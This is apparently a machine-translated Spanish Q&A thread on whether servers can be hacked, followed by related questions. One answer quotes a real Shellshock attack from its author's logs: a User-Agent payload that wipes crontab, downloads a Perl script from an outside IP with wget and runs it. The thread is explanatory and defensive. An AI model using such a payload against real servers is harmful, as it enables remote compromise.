¿Se puede hackear un servidor?

A2A ¿Se puede hackear un servidor? Sí, cualquier cosa puede ser hackeada con buenas herramientas con acceso físico. Entonces, ¿se puede piratear un servidor a través de la red?

A veces.

Como tiene un servidor en una red, debe estar escuchando las solicitudes. Eso significa que hay una superficie de ataque: el conjunto de todas las solicitudes posibles que se pueden enviar, solo algunas de las cuales serán válidas. Si el servidor puede ser pirateado enviando una solicitud depende de si alguien cometió un error. No se garantiza que haya una vulnerabilidad que pueda ser explotada, pero cuanto más complejo es un sistema, más probable es. Los programadores y administradores cometen errores, o simplemente no piensan todo. Por ejemplo, un servidor web Apache con un sitio web estático (sin contenido activo) es bastante robusto; Hay millones en todo el mundo bajo ataque todo el tiempo, y se encuentran y corrigen errores. No es matemáticamente seguro que haya vulnerabilidades en un servidor, pero es estadísticamente probable.

Aquí hay un ataque que tuve hace unos días:

Nombre de script CGI: /cgi-bin/php.cgi
Método de solicitud HTTP: GET
HTTP User-Agent: () {:;}; / usr / bin / perl -e ‘print “Content-Type: text / plain \ r \ n \ r \ nXSUCCESS!”; System (“crontab -r; cd / tmp /; mkdir pet-s-dragon; cd / tmp / pet-s-dragon; wget http://31.184.194.100/pets-dragon-v3.cam.torrent; perl pets-dragon-v3.cam.torrent

Es un intento de explotar el error Shellshock; El error existió entre 1989 y 2014, pero nadie lo descubrió. Desde que parcheé mi servidor en 2014, no es vulnerable a ese ataque en particular, pero podría ser vulnerable a otra cosa. Investigadores de seguridad, delincuentes y agencias gubernamentales trabajan para encontrar vulnerabilidades. Cuando los investigadores los encuentran, generalmente alertan a los encargados del mantenimiento del software que los reparan. Los delincuentes o las agencias gubernamentales pueden usarlos o sentarse en ellos. Si se usan ampliamente, todos lo sabrán y serán parcheados. Una vulnerabilidad conocida pero no revelada se conoce como día cero. Una agencia como la NSA podría usar un día cero como parte de una operación de vigilancia activa; si no lo usan en exceso y los objetivos no lo notan, puede permanecer oculto por algún tiempo.

A veces los servidores son vulnerables a la estupidez. Realmente no es piratería, pero los resultados son los mismos. Si ejecuta un servidor SSH en Internet con una contraseña raíz de “letmein”, o “t00r”, o cualquiera de las otras cien contraseñas comunes, se adivinará en unas pocas horas.

Gracias por A2A,

Respuesta corta: sí, puede ser pirateado.

En Internet, o en cualquier red, existen aproximadamente tres componentes principales: 1) servidores; 2) componentes de red (conmutadores, puntos de acceso y cables); 3) puntos finales (PC, móviles, tabletas, IoT, etc.). TODOS son pirateables, depende de lo que intentes lograr.

Sí, un servidor puede ser pirateado. En general, ninguna computadora es cien por ciento segura, lo cual es un objetivo imposible de alcanzar. Pero podemos hacerlo lo más seguro posible siguiendo las pautas de seguridad.

El firewall es imprescindible, pero también debe saber cómo crear reglas de protección. Los sistemas IDS e IPS también pueden ayudarlo. Si tiene una red, se deben establecer políticas de seguridad para gobernar el entorno.

More Interesting

¿Qué posibilidades hay de que la autenticación biométrica reemplace el uso de contraseñas en los sitios web?

¿La seguridad cibernética incluye piratería?

¿Qué métodos de autenticación y autorización utilizan los sistemas operativos y dispositivos que no son de Windows?

¿Los juegos crackeados contienen virus?

¿Cómo puede una TI más fresca entrar en la ciberseguridad? ¿Cuáles son las oportunidades laborales en India?

¿Cuál es el mejor software de seguridad de internet?

Si uso Wi-Fi público (como en Starbucks), pero inicio sesión en un sitio web a través de HTTPS, ¿está segura mi contraseña?

Cómo eliminar el virus explorer.exe

¿Por qué el espacio clave de una cifra se determina como 2 ^ algo?

¿Pueden los hackers Heartbleed ser condenados? Por ejemplo, este tipo: los canadienses arrestan a un hacker Heartbleed

¿Hay alguna evidencia de puertas traseras en Windows u otro software de cliente para la NSA / CIA?

¿Cómo convertirse en un auditor de seguridad de TI? ¿Y qué conocimiento debo tener a un nivel más fresco?

¿Cuál es el mercado objetivo para la startup que ofrece pruebas de penetración y servicios de consultoría de seguridad de TI?

¿Qué sabemos sobre el sistema de seguridad de la información en la firma de abogados en el centro del escándalo de los Papeles de Panamá?

¿Cómo se puede estar seguro de que un correo electrónico recibido se envía de hecho desde el remitente citado en el encabezado del correo electrónico?